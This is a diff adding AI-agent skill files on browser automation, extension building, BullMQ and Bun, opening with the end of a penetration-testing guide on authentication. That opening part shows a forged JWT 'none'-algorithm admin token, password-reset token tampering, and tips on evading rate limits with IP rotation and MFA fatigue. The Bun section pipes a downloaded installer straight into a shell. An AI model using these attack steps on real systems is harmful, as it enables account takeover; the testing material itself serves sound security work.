|
||||
# Some systems treat these as different accounts
|
||||
```
|
||||
|
||||
### Example 2: JWT Token Attack
|
||||
|
||||
**Scenario:** Exploit weak JWT implementation
|
||||
|
||||
```bash
|
||||
# Step 1: Capture JWT token
|
||||
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCJ9.signature
|
||||
|
||||
# Step 2: Decode and analyze
|
||||
# Header: {"alg":"HS256","typ":"JWT"}
|
||||
# Payload: {"user":"test","role":"user"}
|
||||
|
||||
# Step 3: Try "none" algorithm attack
|
||||
# Change header to: {"alg":"none","typ":"JWT"}
|
||||
# Remove signature
|
||||
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiYWRtaW4ifQ.
|
||||
|
||||
# Step 4: Submit modified token
|
||||
Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
|
||||
```
|
||||
|
||||
### Example 3: Password Reset Token Exploitation
|
||||
|
||||
**Scenario:** Test password reset functionality
|
||||
|
||||
```bash
|
||||
# Step 1: Request reset for test account
|
||||
POST /forgot-password
|
||||
email=test@example.com
|
||||
|
||||
# Step 2: Capture reset link
|
||||
https://target.com/reset?token=a1b2c3d4e5f6
|
||||
|
||||
# Step 3: Test token properties
|
||||
# Reuse: Try using same token twice
|
||||
# Expiration: Wait 24+ hours and retry
|
||||
# Modification: Change characters in token
|
||||
|
||||
# Step 4: Test for user parameter manipulation
|
||||
https://target.com/reset?token=a1b2c3d4e5f6&email=admin@example.com
|
||||
# Check if admin's password can be reset with test user's token
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Solutions |
|
||||
|-------|-----------|
|
||||
| Brute force too slow | Identify rate limit scope; IP rotation; add delays; use targeted wordlists |
|
||||
| Session analysis inconclusive | Collect 1000+ tokens; use statistical tools; check for timestamps; compare accounts |
|
||||
| MFA cannot be bypassed | Document as secure; test backup/recovery mechanisms; check MFA fatigue; verify enrollment |
|
||||
| Account lockout prevents testing | Request multiple test accounts; test threshold first; use slower timing |
|
||||
70
skills/browser-automation/SKILL.md
Normal file
70
skills/browser-automation/SKILL.md
Normal file
@@ -0,0 +1,70 @@
|
||||
---
|
||||
name: browser-automation
|
||||
description: "Browser automation powers web testing, scraping, and AI agent interactions. The difference between a flaky script and a reliable system comes down to understanding selectors, waiting strategies, and anti-detection patterns. This skill covers Playwright (recommended) and Puppeteer, with patterns for testing, scraping, and agentic browser control. Key insight: Playwright won the framework war. Unless you need Puppeteer's stealth ecosystem or are Chrome-only, Playwright is the better choice in 202"
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Browser Automation
|
||||
|
||||
You are a browser automation expert who has debugged thousands of flaky tests
|
||||
and built scrapers that run for years without breaking. You've seen the
|
||||
evolution from Selenium to Puppeteer to Playwright and understand exactly
|
||||
when each tool shines.
|
||||
|
||||
Your core insight: Most automation failures come from three sources - bad
|
||||
selectors, missing waits, and detection systems. You teach people to think
|
||||
like the browser, use the right selectors, and let Playwright's auto-wait
|
||||
do its job.
|
||||
|
||||
For scraping, yo
|
||||
|
||||
## Capabilities
|
||||
|
||||
- browser-automation
|
||||
- playwright
|
||||
- puppeteer
|
||||
- headless-browsers
|
||||
- web-scraping
|
||||
- browser-testing
|
||||
- e2e-testing
|
||||
- ui-automation
|
||||
- selenium-alternatives
|
||||
|
||||
## Patterns
|
||||
|
||||
### Test Isolation Pattern
|
||||
|
||||
Each test runs in complete isolation with fresh state
|
||||
|
||||
### User-Facing Locator Pattern
|
||||
|
||||
Select elements the way users see them
|
||||
|
||||
### Auto-Wait Pattern
|
||||
|
||||
Let Playwright wait automatically, never add manual waits
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Arbitrary Timeouts
|
||||
|
||||
### ❌ CSS/XPath First
|
||||
|
||||
### ❌ Single Browser Context for Everything
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | # REMOVE all waitForTimeout calls |
|
||||
| Issue | high | # Use user-facing locators instead: |
|
||||
| Issue | high | # Use stealth plugins: |
|
||||
| Issue | high | # Each test must be fully isolated: |
|
||||
| Issue | medium | # Enable traces for failures: |
|
||||
| Issue | medium | # Set consistent viewport: |
|
||||
| Issue | high | # Add delays between requests: |
|
||||
| Issue | medium | # Wait for popup BEFORE triggering it: |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `agent-tool-builder`, `workflow-automation`, `computer-use-agents`, `test-architect`
|
||||
261
skills/browser-extension-builder/SKILL.md
Normal file
261
skills/browser-extension-builder/SKILL.md
Normal file
@@ -0,0 +1,261 @@
|
||||
---
|
||||
name: browser-extension-builder
|
||||
description: "Expert in building browser extensions that solve real problems - Chrome, Firefox, and cross-browser extensions. Covers extension architecture, manifest v3, content scripts, popup UIs, monetization strategies, and Chrome Web Store publishing. Use when: browser extension, chrome extension, firefox addon, extension, manifest v3."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Browser Extension Builder
|
||||
|
||||
**Role**: Browser Extension Architect
|
||||
|
||||
You extend the browser to give users superpowers. You understand the
|
||||
unique constraints of extension development - permissions, security,
|
||||
store policies. You build extensions that people install and actually
|
||||
use daily. You know the difference between a toy and a tool.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Extension architecture
|
||||
- Manifest v3 (MV3)
|
||||
- Content scripts
|
||||
- Background workers
|
||||
- Popup interfaces
|
||||
- Extension monetization
|
||||
- Chrome Web Store publishing
|
||||
- Cross-browser support
|
||||
|
||||
## Patterns
|
||||
|
||||
### Extension Architecture
|
||||
|
||||
Structure for modern browser extensions
|
||||
|
||||
**When to use**: When starting a new extension
|
||||
|
||||
```javascript
|
||||
## Extension Architecture
|
||||
|
||||
### Project Structure
|
||||
```
|
||||
extension/
|
||||
├── manifest.json # Extension config
|
||||
├── popup/
|
||||
│ ├── popup.html # Popup UI
|
||||
│ ├── popup.css
|
||||
│ └── popup.js
|
||||
├── content/
|
||||
│ └── content.js # Runs on web pages
|
||||
├── background/
|
||||
│ └── service-worker.js # Background logic
|
||||
├── options/
|
||||
│ ├── options.html # Settings page
|
||||
│ └── options.js
|
||||
└── icons/
|
||||
├── icon16.png
|
||||
├── icon48.png
|
||||
└── icon128.png
|
||||
```
|
||||
|
||||
### Manifest V3 Template
|
||||
```json
|
||||
{
|
||||
"manifest_version": 3,
|
||||
"name": "My Extension",
|
||||
"version": "1.0.0",
|
||||
"description": "What it does",
|
||||
"permissions": ["storage", "activeTab"],
|
||||
"action": {
|
||||
"default_popup": "popup/popup.html",
|
||||
"default_icon": {
|
||||
"16": "icons/icon16.png",
|
||||
"48": "icons/icon48.png",
|
||||
"128": "icons/icon128.png"
|
||||
}
|
||||
},
|
||||
"content_scripts": [{
|
||||
"matches": ["<all_urls>"],
|
||||
"js": ["content/content.js"]
|
||||
}],
|
||||
"background": {
|
||||
"service_worker": "background/service-worker.js"
|
||||
},
|
||||
"options_page": "options/options.html"
|
||||
}
|
||||
```
|
||||
|
||||
### Communication Pattern
|
||||
```
|
||||
Popup ←→ Background (Service Worker) ←→ Content Script
|
||||
↓
|
||||
chrome.storage
|
||||
```
|
||||
```
|
||||
|
||||
### Content Scripts
|
||||
|
||||
Code that runs on web pages
|
||||
|
||||
**When to use**: When modifying or reading page content
|
||||
|
||||
```javascript
|
||||
## Content Scripts
|
||||
|
||||
### Basic Content Script
|
||||
```javascript
|
||||
// content.js - Runs on every matched page
|
||||
|
||||
// Wait for page to load
|
||||
document.addEventListener('DOMContentLoaded', () => {
|
||||
// Modify the page
|
||||
const element = document.querySelector('.target');
|
||||
if (element) {
|
||||
element.style.backgroundColor = 'yellow';
|
||||
}
|
||||
});
|
||||
|
||||
// Listen for messages from popup/background
|
||||
chrome.runtime.onMessage.addListener((message, sender, sendResponse) => {
|
||||
if (message.action === 'getData') {
|
||||
const data = document.querySelector('.data')?.textContent;
|
||||
sendResponse({ data });
|
||||
}
|
||||
return true; // Keep channel open for async
|
||||
});
|
||||
```
|
||||
|
||||
### Injecting UI
|
||||
```javascript
|
||||
// Create floating UI on page
|
||||
function injectUI() {
|
||||
const container = document.createElement('div');
|
||||
container.id = 'my-extension-ui';
|
||||
container.innerHTML = `
|
||||
<div style="position: fixed; bottom: 20px; right: 20px;
|
||||
background: white; padding: 16px; border-radius: 8px;
|
||||
box-shadow: 0 4px 12px rgba(0,0,0,0.15); z-index: 10000;">
|
||||
<h3>My Extension</h3>
|
||||
<button id="my-extension-btn">Click me</button>
|
||||
</div>
|
||||
`;
|
||||
document.body.appendChild(container);
|
||||
|
||||
document.getElementById('my-extension-btn').addEventListener('click', () => {
|
||||
// Handle click
|
||||
});
|
||||
}
|
||||
|
||||
injectUI();
|
||||
```
|
||||
|
||||
### Permissions for Content Scripts
|
||||
```json
|
||||
{
|
||||
"content_scripts": [{
|
||||
"matches": ["https://specific-site.com/*"],
|
||||
"js": ["content.js"],
|
||||
"run_at": "document_end"
|
||||
}]
|
||||
}
|
||||
```
|
||||
```
|
||||
|
||||
### Storage and State
|
||||
|
||||
Persisting extension data
|
||||
|
||||
**When to use**: When saving user settings or data
|
||||
|
||||
```javascript
|
||||
## Storage and State
|
||||
|
||||
### Chrome Storage API
|
||||
```javascript
|
||||
// Save data
|
||||
chrome.storage.local.set({ key: 'value' }, () => {
|
||||
console.log('Saved');
|
||||
});
|
||||
|
||||
// Get data
|
||||
chrome.storage.local.get(['key'], (result) => {
|
||||
console.log(result.key);
|
||||
});
|
||||
|
||||
// Sync storage (syncs across devices)
|
||||
chrome.storage.sync.set({ setting: true });
|
||||
|
||||
// Watch for changes
|
||||
chrome.storage.onChanged.addListener((changes, area) => {
|
||||
if (changes.key) {
|
||||
console.log('key changed:', changes.key.newValue);
|
||||
}
|
||||
});
|
||||
```
|
||||
|
||||
### Storage Limits
|
||||
| Type | Limit |
|
||||
|------|-------|
|
||||
| local | 5MB |
|
||||
| sync | 100KB total, 8KB per item |
|
||||
|
||||
### Async/Await Pattern
|
||||
```javascript
|
||||
// Modern async wrapper
|
||||
async function getStorage(keys) {
|
||||
return new Promise((resolve) => {
|
||||
chrome.storage.local.get(keys, resolve);
|
||||
});
|
||||
}
|
||||
|
||||
async function setStorage(data) {
|
||||
return new Promise((resolve) => {
|
||||
chrome.storage.local.set(data, resolve);
|
||||
});
|
||||
}
|
||||
|
||||
// Usage
|
||||
const { settings } = await getStorage(['settings']);
|
||||
await setStorage({ settings: { ...settings, theme: 'dark' } });
|
||||
```
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Requesting All Permissions
|
||||
|
||||
**Why bad**: Users won't install.
|
||||
Store may reject.
|
||||
Security risk.
|
||||
Bad reviews.
|
||||
|
||||
**Instead**: Request minimum needed.
|
||||
Use optional permissions.
|
||||
Explain why in description.
|
||||
Request at time of use.
|
||||
|
||||
### ❌ Heavy Background Processing
|
||||
|
||||
**Why bad**: MV3 terminates idle workers.
|
||||
Battery drain.
|
||||
Browser slows down.
|
||||
Users uninstall.
|
||||
|
||||
**Instead**: Keep background minimal.
|
||||
Use alarms for periodic tasks.
|
||||
Offload to content scripts.
|
||||
Cache aggressively.
|
||||
|
||||
### ❌ Breaking on Updates
|
||||
|
||||
**Why bad**: Selectors change.
|
||||
APIs change.
|
||||
Angry users.
|
||||
Bad reviews.
|
||||
|
||||
**Instead**: Use stable selectors.
|
||||
Add error handling.
|
||||
Monitor for breakage.
|
||||
Update quickly when broken.
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `frontend`, `micro-saas-launcher`, `personal-tool-builder`
|
||||
57
skills/bullmq-specialist/SKILL.md
Normal file
57
skills/bullmq-specialist/SKILL.md
Normal file
@@ -0,0 +1,57 @@
|
||||
---
|
||||
name: bullmq-specialist
|
||||
description: "BullMQ expert for Redis-backed job queues, background processing, and reliable async execution in Node.js/TypeScript applications. Use when: bullmq, bull queue, redis queue, background job, job queue."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# BullMQ Specialist
|
||||
|
||||
You are a BullMQ expert who has processed billions of jobs in production.
|
||||
You understand that queues are the backbone of scalable applications - they
|
||||
decouple services, smooth traffic spikes, and enable reliable async processing.
|
||||
|
||||
You've debugged stuck jobs at 3am, optimized worker concurrency for maximum
|
||||
throughput, and designed job flows that handle complex multi-step processes.
|
||||
You know that most queue problems are actually Redis problems or application
|
||||
design problems.
|
||||
|
||||
Your core philosophy:
|
||||
|
||||
## Capabilities
|
||||
|
||||
- bullmq-queues
|
||||
- job-scheduling
|
||||
- delayed-jobs
|
||||
- repeatable-jobs
|
||||
- job-priorities
|
||||
- rate-limiting-jobs
|
||||
- job-events
|
||||
- worker-patterns
|
||||
- flow-producers
|
||||
- job-dependencies
|
||||
|
||||
## Patterns
|
||||
|
||||
### Basic Queue Setup
|
||||
|
||||
Production-ready BullMQ queue with proper configuration
|
||||
|
||||
### Delayed and Scheduled Jobs
|
||||
|
||||
Jobs that run at specific times or after delays
|
||||
|
||||
### Job Flows and Dependencies
|
||||
|
||||
Complex multi-step job processing with parent-child relationships
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Giant Job Payloads
|
||||
|
||||
### ❌ No Dead Letter Queue
|
||||
|
||||
### ❌ Infinite Concurrency
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `redis-specialist`, `backend`, `nextjs-app-router`, `email-systems`, `ai-workflow-automation`, `performance-hunter`
|
||||
691
skills/bun-development/SKILL.md
Normal file
691
skills/bun-development/SKILL.md
Normal file
@@ -0,0 +1,691 @@
|
||||
---
|
||||
name: bun-development
|
||||
description: "Modern JavaScript/TypeScript development with Bun runtime. Covers package management, bundling, testing, and migration from Node.js. Use when working with Bun, optimizing JS/TS development speed, or migrating from Node.js to Bun."
|
||||
---
|
||||
|
||||
# ⚡ Bun Development
|
||||
|
||||
> Fast, modern JavaScript/TypeScript development with the Bun runtime, inspired by [oven-sh/bun](https://github.com/oven-sh/bun).
|
||||
|
||||
## When to Use This Skill
|
||||
|
||||
Use this skill when:
|
||||
|
||||
- Starting new JS/TS projects with Bun
|
||||
- Migrating from Node.js to Bun
|
||||
- Optimizing development speed
|
||||
- Using Bun's built-in tools (bundler, test runner)
|
||||
- Troubleshooting Bun-specific issues
|
||||
|
||||
---
|
||||
|
||||
## 1. Getting Started
|
||||
|
||||
### 1.1 Installation
|
||||
|
||||
```bash
|
||||
# macOS / Linux
|
||||
curl -fsSL https://bun.sh/install | bash
|
||||
|
||||
# Windows
|
||||
powershell -c "irm bun.sh/install.ps1 | iex"
|
||||
|
||||
# Homebrew
|
||||
brew tap oven-sh/bun
|
||||
brew install bun
|
||||
|
||||
# npm (if needed)
|
||||
npm install -g bun
|
||||
|
||||
# Upgrade
|
||||
bun upgrade
|
||||
```
|
||||
|
||||
### 1.2 Why Bun?
|
||||
|
||||
| Feature | Bun | Node.js |
|
||||
| :-------------- | :------------- | :-------------------------- |
|
||||
| Startup time | ~25ms | ~100ms+ |
|
||||
| Package install | 10-100x faster | Baseline |
|
||||
| TypeScript | Native | Requires transpiler |
|
||||
| JSX | Native | Requires transpiler |
|
||||
| Test runner | Built-in | External (Jest, Vitest) |
|
||||
| Bundler | Built-in | External (Webpack, esbuild) |
|
||||
|
||||
---
|
||||
|
||||
## 2. Project Setup
|
||||
|
||||
### 2.1 Create New Project
|
||||
|
||||
```bash
|
||||
# Initialize project
|
||||
bun init
|
||||
|
||||
# Creates:
|
||||
# ├── package.json
|
||||
# ├── tsconfig.json
|
||||
# ├── index.ts
|
||||
# └── README.md
|
||||
|
||||
# With specific template
|
||||
bun create <template> <project-name>
|
||||
|
||||
# Examples
|
||||
bun create react my-app # React app
|
||||
bun create next my-app # Next.js app
|
||||
bun create vite my-app # Vite app
|
||||
bun create elysia my-api # Elysia API
|
||||
```
|
||||
|
||||
### 2.2 package.json
|
||||
|
||||
```json
|
||||
{
|
||||
"name": "my-bun-project",
|
||||
"version": "1.0.0",
|
||||
"module": "index.ts",
|
||||
"type": "module",
|
||||
"scripts": {
|
||||
"dev": "bun run --watch index.ts",
|
||||
"start": "bun run index.ts",
|
||||
"test": "bun test",
|
||||
"build": "bun build ./index.ts --outdir ./dist",
|
||||
"lint": "bunx eslint ."
|
||||
},
|
||||
"devDependencies": {
|
||||
"@types/bun": "latest"
|
||||
},
|
||||
"peerDependencies": {
|
||||
"typescript": "^5.0.0"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 2.3 tsconfig.json (Bun-optimized)
|
||||
|
||||
```json
|
||||
{
|
||||
"compilerOptions": {
|
||||
"lib": ["ESNext"],
|
||||
"module": "esnext",
|
||||
"target": "esnext",
|
||||
"moduleResolution": "bundler",
|
||||
"moduleDetection": "force",
|
||||
"allowImportingTsExtensions": true,
|
||||
"noEmit": true,
|
||||
"composite": true,
|
||||
"strict": true,
|
||||
"downlevelIteration": true,
|
||||
"skipLibCheck": true,
|
||||
"jsx": "react-jsx",
|
||||
"allowSyntheticDefaultImports": true,
|
||||
"forceConsistentCasingInFileNames": true,
|
||||
"allowJs": true,
|
||||
"types": ["bun-types"]
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Package Management
|
||||
|
||||
### 3.1 Installing Packages
|
||||
|
||||
```bash
|
||||
# Install from package.json
|
||||
bun install # or 'bun i'
|
||||
|
||||
# Add dependencies
|
||||
bun add express # Regular dependency
|
||||
bun add -d typescript # Dev dependency
|
||||
bun add -D @types/node # Dev dependency (alias)
|
||||
bun add --optional pkg # Optional dependency
|
||||
|
||||
# From specific registry
|
||||
bun add lodash --registry https://registry.npmmirror.com
|
||||
|
||||
# Install specific version
|
||||
bun add react@18.2.0
|
||||
bun add react@latest
|
||||
bun add react@next
|
||||
|
||||
# From git
|
||||
bun add github:user/repo
|
||||
bun add git+https://github.com/user/repo.git
|
||||
```
|
||||
|
||||
### 3.2 Removing & Updating
|
||||
|
||||
```bash
|
||||
# Remove package
|
||||
bun remove lodash
|
||||
|
||||
# Update packages
|
||||
bun update # Update all
|
||||
bun update lodash # Update specific
|
||||
bun update --latest # Update to latest (ignore ranges)
|
||||
|
||||
# Check outdated
|
||||
bun outdated
|
||||
```
|
||||
|
||||
### 3.3 bunx (npx equivalent)
|
||||
|
||||
```bash
|
||||
# Execute package binaries
|
||||
bunx prettier --write .
|
||||
bunx tsc --init
|
||||
bunx create-react-app my-app
|
||||
|
||||
# With specific version
|
||||
bunx -p typescript@4.9 tsc --version
|
||||
|
||||
# Run without installing
|
||||
bunx cowsay "Hello from Bun!"
|
||||
```
|
||||
|
||||
### 3.4 Lockfile
|
||||
|
||||
```bash
|
||||
# bun.lockb is a binary lockfile (faster parsing)
|
||||
# To generate text lockfile for debugging:
|
||||
bun install --yarn # Creates yarn.lock
|
||||
|
||||
# Trust existing lockfile
|
||||
bun install --frozen-lockfile
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4. Running Code
|
||||
|
||||
### 4.1 Basic Execution
|
||||
|
||||
```bash
|
||||
# Run TypeScript directly (no build step!)
|
||||
bun run index.ts
|
||||
|
||||
# Run JavaScript
|
||||
bun run index.js
|
||||
|
||||
# Run with arguments
|
||||
bun run server.ts --port 3000
|
||||
|
||||
# Run package.json script
|
||||
bun run dev
|
||||
bun run build
|
||||
|
||||
# Short form (for scripts)
|
||||
bun dev
|
||||
bun build
|
||||
```
|
||||
|
||||
### 4.2 Watch Mode
|
||||
|
||||
```bash
|
||||
# Auto-restart on file changes
|
||||
bun --watch run index.ts
|
||||
|
||||
# With hot reloading
|
||||
bun --hot run server.ts
|
||||
```
|
||||
|
||||
### 4.3 Environment Variables
|
||||
|
||||
```typescript
|
||||
// .env file is loaded automatically!
|
||||
|
||||
// Access environment variables
|
||||
const apiKey = Bun.env.API_KEY;
|
||||
const port = Bun.env.PORT ?? "3000";
|
||||
|
||||
// Or use process.env (Node.js compatible)
|
||||
const dbUrl = process.env.DATABASE_URL;
|
||||
```
|
||||
|
||||
```bash
|
||||
# Run with specific env file
|
||||
bun --env-file=.env.production run index.ts
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 5. Built-in APIs
|
||||
|
||||
### 5.1 File System (Bun.file)
|
||||
|
||||
```typescript
|
||||
// Read file
|
||||
const file = Bun.file("./data.json");
|
||||
const text = await file.text();
|
||||
const json = await file.json();
|
||||
const buffer = await file.arrayBuffer();
|
||||
|
||||
// File info
|
||||
console.log(file.size); // bytes
|
||||
console.log(file.type); // MIME type
|
||||
|
||||
// Write file
|
||||
await Bun.write("./output.txt", "Hello, Bun!");
|
||||
await Bun.write("./data.json", JSON.stringify({ foo: "bar" }));
|
||||
|
||||
// Stream large files
|
||||
const reader = file.stream();
|
||||
for await (const chunk of reader) {
|
||||
console.log(chunk);
|
||||
}
|
||||
```
|
||||
|
||||
### 5.2 HTTP Server (Bun.serve)
|
||||
|
||||
```typescript
|
||||
const server = Bun.serve({
|
||||
port: 3000,
|
||||
|
||||
fetch(request) {
|
||||
const url = new URL(request.url);
|
||||
|
||||
if (url.pathname === "/") {
|
||||
return new Response("Hello World!");
|
||||
}
|
||||
|
||||
if (url.pathname === "/api/users") {
|
||||
return Response.json([
|
||||
{ id: 1, name: "Alice" },
|
||||
{ id: 2, name: "Bob" },
|
||||
]);
|
||||
}
|
||||
|
||||
return new Response("Not Found", { status: 404 });
|
||||
},
|
||||
|
||||
error(error) {
|
||||
return new Response(`Error: ${error.message}`, { status: 500 });
|
||||
},
|
||||
});
|
||||
|
||||
console.log(`Server running at http://localhost:${server.port}`);
|
||||
```
|
||||
|
||||
### 5.3 WebSocket Server
|
||||
|
||||
```typescript
|
||||
const server = Bun.serve({
|
||||
port: 3000,
|
||||
|
||||
fetch(req, server) {
|
||||
// Upgrade to WebSocket
|
||||
if (server.upgrade(req)) {
|
||||
return; // Upgraded
|
||||
}
|
||||
return new Response("Upgrade failed", { status: 500 });
|
||||
},
|
||||
|
||||
websocket: {
|
||||
open(ws) {
|
||||
console.log("Client connected");
|
||||
ws.send("Welcome!");
|
||||
},
|
||||
|
||||
message(ws, message) {
|
||||
console.log(`Received: ${message}`);
|
||||
ws.send(`Echo: ${message}`);
|
||||
},
|
||||
|
||||
close(ws) {
|
||||
console.log("Client disconnected");
|
||||
},
|
||||
},
|
||||
});
|
||||
```
|
||||
|
||||
### 5.4 SQLite (Bun.sql)
|
||||
|
||||
```typescript
|
||||
import { Database } from "bun:sqlite";
|
||||
|
||||
const db = new Database("mydb.sqlite");
|
||||
|
||||
// Create table
|
||||
db.run(`
|
||||
CREATE TABLE IF NOT EXISTS users (
|
||||
id INTEGER PRIMARY KEY AUTOINCREMENT,
|
||||
name TEXT NOT NULL,
|
||||
email TEXT UNIQUE
|
||||
)
|
||||
`);
|
||||
|
||||
// Insert
|
||||
const insert = db.prepare("INSERT INTO users (name, email) VALUES (?, ?)");
|
||||
insert.run("Alice", "alice@example.com");
|
||||
|
||||
// Query
|
||||
const query = db.prepare("SELECT * FROM users WHERE name = ?");
|
||||
const user = query.get("Alice");
|
||||
console.log(user); // { id: 1, name: "Alice", email: "alice@example.com" }
|
||||
|
||||
// Query all
|
||||
const allUsers = db.query("SELECT * FROM users").all();
|
||||
```
|
||||
|
||||
### 5.5 Password Hashing
|
||||
|
||||
```typescript
|
||||
// Hash password
|
||||
const password = "super-secret";
|
||||
const hash = await Bun.password.hash(password);
|
||||
|
||||
// Verify password
|
||||
const isValid = await Bun.password.verify(password, hash);
|
||||
console.log(isValid); // true
|
||||
|
||||
// With algorithm options
|
||||
const bcryptHash = await Bun.password.hash(password, {
|
||||
algorithm: "bcrypt",
|
||||
cost: 12,
|
||||
});
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. Testing
|
||||
|
||||
### 6.1 Basic Tests
|
||||
|
||||
```typescript
|
||||
// math.test.ts
|
||||
import { describe, it, expect, beforeAll, afterAll } from "bun:test";
|
||||
|
||||
describe("Math operations", () => {
|
||||
it("adds two numbers", () => {
|
||||
expect(1 + 1).toBe(2);
|
||||
});
|
||||
|
||||
it("subtracts two numbers", () => {
|
||||
expect(5 - 3).toBe(2);
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### 6.2 Running Tests
|
||||
|
||||
```bash
|
||||
# Run all tests
|
||||
bun test
|
||||
|
||||
# Run specific file
|
||||
bun test math.test.ts
|
||||
|
||||
# Run matching pattern
|
||||
bun test --grep "adds"
|
||||
|
||||
# Watch mode
|
||||
bun test --watch
|
||||
|
||||
# With coverage
|
||||
bun test --coverage
|
||||
|
||||
# Timeout
|
||||
bun test --timeout 5000
|
||||
```
|
||||
|
||||
### 6.3 Matchers
|
||||
|
||||
```typescript
|
||||
import { expect, test } from "bun:test";
|
||||
|
||||
test("matchers", () => {
|
||||
// Equality
|
||||
expect(1).toBe(1);
|
||||
expect({ a: 1 }).toEqual({ a: 1 });
|
||||
expect([1, 2]).toContain(1);
|
||||
|
||||
// Comparisons
|
||||
expect(10).toBeGreaterThan(5);
|
||||
expect(5).toBeLessThanOrEqual(5);
|
||||
|
||||
// Truthiness
|
||||
expect(true).toBeTruthy();
|
||||
expect(null).toBeNull();
|
||||
expect(undefined).toBeUndefined();
|
||||
|
||||
// Strings
|
||||
expect("hello").toMatch(/ell/);
|
||||
expect("hello").toContain("ell");
|
||||
|
||||
// Arrays
|
||||
expect([1, 2, 3]).toHaveLength(3);
|
||||
|
||||
// Exceptions
|
||||
expect(() => {
|
||||
throw new Error("fail");
|
||||
}).toThrow("fail");
|
||||
|
||||
// Async
|
||||
await expect(Promise.resolve(1)).resolves.toBe(1);
|
||||
await expect(Promise.reject("err")).rejects.toBe("err");
|
||||
});
|
||||
```
|
||||
|
||||
### 6.4 Mocking
|
||||
|
||||
```typescript
|
||||
import { mock, spyOn } from "bun:test";
|
||||
|
||||
// Mock function
|
||||
const mockFn = mock((x: number) => x * 2);
|
||||
mockFn(5);
|
||||
expect(mockFn).toHaveBeenCalled();
|
||||
expect(mockFn).toHaveBeenCalledWith(5);
|
||||
expect(mockFn.mock.results[0].value).toBe(10);
|
||||
|
||||
// Spy on method
|
||||
const obj = {
|
||||
method: () => "original",
|
||||
};
|
||||
const spy = spyOn(obj, "method").mockReturnValue("mocked");
|
||||
expect(obj.method()).toBe("mocked");
|
||||
expect(spy).toHaveBeenCalled();
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 7. Bundling
|
||||
|
||||
### 7.1 Basic Build
|
||||
|
||||
```bash
|
||||
# Bundle for production
|
||||
bun build ./src/index.ts --outdir ./dist
|
||||
|
||||
# With options
|
||||
bun build ./src/index.ts \
|
||||
--outdir ./dist \
|
||||
--target browser \
|
||||
--minify \
|
||||
--sourcemap
|
||||
```
|
||||
|
||||
### 7.2 Build API
|
||||
|
||||
```typescript
|
||||
const result = await Bun.build({
|
||||
entrypoints: ["./src/index.ts"],
|
||||
outdir: "./dist",
|
||||
target: "browser", // or "bun", "node"
|
||||
minify: true,
|
||||
sourcemap: "external",
|
||||
splitting: true,
|
||||
format: "esm",
|
||||
|
||||
// External packages (not bundled)
|
||||
external: ["react", "react-dom"],
|
||||
|
||||
// Define globals
|
||||
define: {
|
||||
"process.env.NODE_ENV": JSON.stringify("production"),
|
||||
},
|
||||
|
||||
// Naming
|
||||
naming: {
|
||||
entry: "[name].[hash].js",
|
||||
chunk: "chunks/[name].[hash].js",
|
||||
asset: "assets/[name].[hash][ext]",
|
||||
},
|
||||
});
|
||||
|
||||
if (!result.success) {
|
||||
console.error(result.logs);
|
||||
}
|
||||
```
|
||||
|
||||
### 7.3 Compile to Executable
|
||||
|
||||
```bash
|
||||
# Create standalone executable
|
||||
bun build ./src/cli.ts --compile --outfile myapp
|
||||
|
||||
# Cross-compile
|
||||
bun build ./src/cli.ts --compile --target=bun-linux-x64 --outfile myapp-linux
|
||||
bun build ./src/cli.ts --compile --target=bun-darwin-arm64 --outfile myapp-mac
|
||||
|
||||
# With embedded assets
|
||||
bun build ./src/cli.ts --compile --outfile myapp --embed ./assets
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 8. Migration from Node.js
|
||||
|
||||
### 8.1 Compatibility
|
||||
|
||||
```typescript
|
||||
// Most Node.js APIs work out of the box
|
||||
import fs from "fs";
|
||||
import path from "path";
|
||||
import crypto from "crypto";
|
||||
|
||||
// process is global
|
||||
console.log(process.cwd());
|
||||
console.log(process.env.HOME);
|
||||
|
||||
// Buffer is global
|
||||
const buf = Buffer.from("hello");
|
||||
|
||||
// __dirname and __filename work
|
||||
console.log(__dirname);
|
||||
console.log(__filename);
|
||||
```
|
||||
|
||||
### 8.2 Common Migration Steps
|
||||
|
||||
```bash
|
||||
# 1. Install Bun
|
||||
curl -fsSL https://bun.sh/install | bash
|
||||
|
||||
# 2. Replace package manager
|
||||
rm -rf node_modules package-lock.json
|
||||
bun install
|
||||
|
||||
# 3. Update scripts in package.json
|
||||
# "start": "node index.js" → "start": "bun run index.ts"
|
||||
# "test": "jest" → "test": "bun test"
|
||||
|
||||
# 4. Add Bun types
|
||||
bun add -d @types/bun
|
||||
```
|
||||
|
||||
### 8.3 Differences from Node.js
|
||||
|
||||
```typescript
|
||||
// ❌ Node.js specific (may not work)
|
||||
require("module") // Use import instead
|
||||
require.resolve("pkg") // Use import.meta.resolve
|
||||
__non_webpack_require__ // Not supported
|
||||
|
||||
// ✅ Bun equivalents
|
||||
import pkg from "pkg";
|
||||
